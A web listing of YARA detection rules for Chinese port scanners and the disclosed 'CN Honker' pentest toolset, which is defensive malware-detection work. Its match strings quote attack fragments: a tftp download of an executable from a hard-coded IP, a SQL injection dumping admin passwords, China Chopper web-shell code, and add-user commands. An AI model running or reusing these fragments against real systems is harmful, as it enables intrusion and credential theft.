Detects a chinese Portscanner named MilkT - shipped BAT
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Hacktool_MilkT_BAT {
meta:
description = "Detects a chinese Portscanner named MilkT - shipped BAT"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
score = 70
date = "12.10.2014"
id = "d680a5f1-6182-5bc8-99de-c3cba1a61903"
strings:
$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
condition:
all of them
}
Copy rule
CN_Hacktool_MilkT_Scanner
Detects a chinese Portscanner named MilkT
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Hacktool_MilkT_Scanner {
meta:
description = "Detects a chinese Portscanner named MilkT"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
score = 60
date = "12.10.2014"
id = "aa83c983-25c2-5051-88a1-fbc70d947d6e"
strings:
$s0 = "Bf **************" ascii fullword
$s1 = "forming Time: %d/" ascii
$s2 = "KERNEL32.DLL" ascii fullword
$s3 = "CRTDLL.DLL" ascii fullword
$s4 = "WS2_32.DLL" ascii fullword
$s5 = "GetProcAddress" ascii fullword
$s6 = "atoi" ascii fullword
condition:
all of them
}
Copy rule
CN_Hacktool_SSPort_Portscanner
Detects a chinese Portscanner named SSPort
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Hacktool_SSPort_Portscanner {
meta:
description = "Detects a chinese Portscanner named SSPort"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
score = 70
date = "12.10.2014"
id = "38cc8830-efd3-51b7-8ac6-c9bf468212cb"
strings:
$s0 = "Golden Fox" fullword wide
$s1 = "Syn Scan Port" fullword wide
$s2 = "CZ88.NET" fullword wide
condition:
all of them
}
Copy rule
CN_Hacktool_S_EXE_Portscanner
Detects a chinese Portscanner named s.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Hacktool_S_EXE_Portscanner {
meta:
description = "Detects a chinese Portscanner named s.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
score = 70
date = "12.10.2014"
id = "d6b35d4f-7e25-50dd-bef2-08f7033312e8"
strings:
$s0 = "\\Result.txt" ascii
$s1 = "By:ZT QQ:376789051" fullword ascii
$s2 = "(http://www.eyuyan.com)" fullword wide
condition:
all of them
}
Copy rule
CN_Hacktool_ScanPort_Portscanner
Detects a chinese Portscanner named ScanPort
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Hacktool_ScanPort_Portscanner {
meta:
description = "Detects a chinese Portscanner named ScanPort"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
score = 70
date = "12.10.2014"
id = "a708283e-339c-599f-9321-3b063d0076a9"
strings:
$s0 = "LScanPort" fullword wide
$s1 = "LScanPort Microsoft" fullword wide
$s2 = "www.yupsoft.com" fullword wide
condition:
all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_ACCESS_brute {
meta:
description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
strings:
$s1 = ".dns166.co" ascii /* PEStudio Blacklist: strings */
$s2 = "SExecuteA" ascii /* PEStudio Blacklist: strings */
$s3 = "ality/clsCom" ascii
$s4 = "NT_SINK_AddRef" ascii
$s5 = "WINDOWS\\Syswm" ascii
condition:
uint16(0) == 0x5a4d and filesize < 20KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file wshell.txt
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_ASP_wshell {
meta:
description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
id = "028136cd-129b-5d58-a4c2-ba730a798c06"
strings:
$s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "UserPass="
$s2 = "VerName="
$s3 = "StateName="
condition:
uint16(0) == 0x253c and filesize < 200KB and all of them
}
Copy rule
Script from disclosed CN Honker Pentest Toolset - file D.ASP
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Alien_D {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "de9cd4bd72b1384b182d58621f51815a77a5f07d"
id = "88529577-0dea-5aa8-b763-79a69397ddd5"
strings:
$s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii /* PEStudio Blacklist: strings */
$s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
$s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
condition:
filesize < 30KB and 2 of them
}
Copy rule
Script from disclosed CN Honker Pentest Toolset - file command.txt
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Alien_command {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5896b74158ef153d426fba76c2324cd9c261c709"
id = "55dd10c9-f7dc-5ee2-a47d-dab8cc7b60e6"
strings:
$s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 8KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file ee.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Alien_ee {
meta:
description = "Sample from CN Honker Pentest Toolset - file ee.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
id = "03540f82-6662-55e3-97f8-38776271f08b"
strings:
$s1 = "GetIIS UserName and PassWord." fullword wide /* PEStudio Blacklist: strings */
$s2 = "Read IIS ID For FreeHost." fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 50KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file iispwd.vbs
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Alien_iispwd {
meta:
description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
strings:
$s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 3KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Arp_EMP_v1_0 {
meta:
description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
id = "03782e94-4fac-529f-b235-19cdb124d53b"
strings:
$s0 = "Arp EMP v1.0.exe" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file AspxClient.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_AspxClient {
meta:
description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2022-12-21"
score = 70
hash = "67569a89128f503a459eab3daa2032261507f2d2"
id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
strings:
$s1 = "\\tools\\hashq\\hashq.exe" wide
$s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
$s3 = "\\myshell.mdb" wide /* PEStudio Blacklist: strings */
$s4 = "injectfile" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them
}
Copy rule
CN_Honker_Baidu_Extractor_Ver1_0
Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Baidu_Extractor_Ver1_0 {
meta:
description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
strings:
$s3 = "\\Users\\Admin" wide /* PEStudio Blacklist: strings */
$s11 = "soso.com" fullword wide
$s12 = "baidu.com" fullword wide
$s19 = "cmd /c ping " fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 500KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file CooKie.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_COOKIE_CooKie {
meta:
description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
strings:
$s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "CooKie.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 360KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file ChinaChopper.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_ChinaChopper {
meta:
description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
strings:
$s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide /* PEStudio Blacklist: strings */
$s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide /* PEStudio Blacklist: strings */
$s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
}
Copy rule
CN_Honker_ChinaChopper_db
Script from disclosed CN Honker Pentest Toolset - file db.mdb
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_ChinaChopper_db {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "af79ff2689a6b7a90a5d3c0ebe709e42f2a15597"
id = "1314e204-d3f5-5f0a-bb74-dc774fef3d3c"
strings:
$s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide /* PEStudio Blacklist: strings */
$s2 = "<O>act=login</O>" fullword wide /* PEStudio Blacklist: strings */
$s3 = "<H>localhost</H>" fullword wide /* PEStudio Blacklist: strings */
condition:
filesize < 340KB and 2 of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file Churrasco.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Churrasco {
meta:
description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
strings:
$s0 = "HEAD9 /" ascii
$s1 = "logic_er" fullword ascii
$s6 = "proggam" fullword ascii
$s16 = "DtcGetTransactionManagerExA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 12 times */
$s17 = "GetUserNameA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 305 times */
$s18 = "OLEAUT" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1276KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file CleanIISLog.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_CleanIISLog {
meta:
description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
id = "3931ba63-faf5-5b44-879c-105cd2812712"
strings:
$s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
Copy rule
CN_Honker_CnCerT_CCdoor_CMD
Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_CnCerT_CCdoor_CMD {
meta:
description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
strings:
$s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
$s3 = "cmdpath" fullword ascii
$s4 = "Get4Bytes" fullword ascii
$s5 = "ExcuteCmd" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 22KB and all of them
}
Copy rule
CN_Honker_CnCerT_CCdoor_CMD_2
Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_CnCerT_CCdoor_CMD_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
strings:
$s0 = "cmd.dll" fullword wide
$s1 = "cmdpath" fullword ascii
$s2 = "Get4Bytes" fullword ascii
$s3 = "ExcuteCmd" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 22KB and all of them
}
Copy rule
CN_Honker_Codeeer_Explorer
Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Codeeer_Explorer {
meta:
description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
strings:
$s2 = "Codeeer Explorer.exe" fullword wide /* PEStudio Blacklist: strings */
$s12 = "webBrowser1_ProgressChanged" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 470KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file CookiesView.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_CookiesView {
meta:
description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
strings:
$s0 = "V1.0 Http://www.darkst.com Code:New4" fullword ascii
$s1 = "maotpo@126.com" fullword ascii
$s2 = "www.baidu.com" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 640KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file scan.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_CoolScan_scan {
meta:
description = "Sample from CN Honker Pentest Toolset - file scan.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
id = "781446d2-3363-56c3-9767-c7ac70047b68"
strings:
$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "scan web.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3680KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file SHELL.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Cracker_SHELL {
meta:
description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
id = "2249a058-7469-5054-9c51-cb20ef8197ca"
strings:
$s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
$s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
$s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
Copy rule
CN_Honker_DLL_passive_privilege_escalation_ws2help
Sample from CN Honker Pentest Toolset - file ws2help.dll
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
meta:
description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
strings:
$s0 = "PassMinDll.dll" fullword ascii
$s1 = "\\ws2help.dll" ascii
condition:
uint16(0) == 0x5a4d and filesize < 30KB and all of them
}
Copy rule
CN_Honker_D_injection_V2_32
Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_D_injection_V2_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
strings:
$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}
Copy rule
CN_Honker_DictionaryGenerator
Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_DictionaryGenerator {
meta:
description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
strings:
$s1 = "`PasswordBuilder" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "cracker" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3650KB and all of them
}
Copy rule
CN_Honker_F4ck_Team_BlackMoon_Jun15
Sample from CN Honker Pentest Toolset - file f4ck.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_F4ck_Team_BlackMoon_Jun15 {
meta:
description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
date = "2015-06-23"
score = 70
hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
id = "df12daca-8e03-5382-b71d-96a747d3a043"
strings:
$s1 = "File UserName PassWord [comment] /add" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Net.exe Add User" fullword ascii
$s3 = "BlackMoon RunTime Error:" fullword ascii
$s4 = "Team.F4ck.Net" fullword wide
$s5 = "admin 123456789" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "blackmoon" fullword ascii
$s7 = "f4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
}
Copy rule
CN_Honker_F4ck_Team_F4ck_3
Sample from CN Honker Pentest Toolset - file F4ck_3.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_F4ck_Team_F4ck_3 {
meta:
description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
id = "1767669f-47d0-5d6e-97a5-92522f988102"
strings:
$s1 = "F4ck.exe" fullword wide
$s2 = "@Netapi32.dll" fullword ascii
$s3 = "Team.F4ck.Net" fullword wide
$s6 = "NO Net Add User" fullword wide
$s7 = "DLL ERROR" fullword ascii
$s11 = "F4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
}
Copy rule
Script from disclosed CN Honker Pentest Toolset - file f4ck.txt
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_F4ck_Team_f4ck {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
strings:
$s0 = "PassWord:F4ckTeam!@#" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "UserName:F4ck" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "F4ck Team" fullword ascii
condition:
filesize < 1KB and all of them
}
Copy rule
CN_Honker_F4ck_Team_f4ck_2
Sample from CN Honker Pentest Toolset - file f4ck_2.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_F4ck_Team_f4ck_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0783661077312753802bd64bf5d35c4666ad0a82"
id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
strings:
$s1 = "F4ck.exe" fullword wide
$s2 = "@Netapi32.dll" fullword ascii
$s3 = "Team.F4ck.Net" fullword wide
$s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
$s9 = "F4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file FTP_scanning.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_FTP_scanning {
meta:
description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
strings:
$s1 = "CNotSupportedE" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "nINet.dll" fullword ascii
$s9 = "?=MODULE" fullword ascii /* PEStudio Blacklist: strings */
$s13 = "MSIE 6*" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file Fckeditor.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Fckeditor {
meta:
description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "4b16ae12c204f64265acef872526b27111b68820"
id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
strings:
$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
$s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1340KB and all of them
}
Copy rule
Sample from CN Honker Pentest Toolset - file FPipe.exe
source signature-baseauthor Florian Roth (Nextron Systems)
view YARA rule
rule CN_Honker_Fpipe_FPipe {
meta:
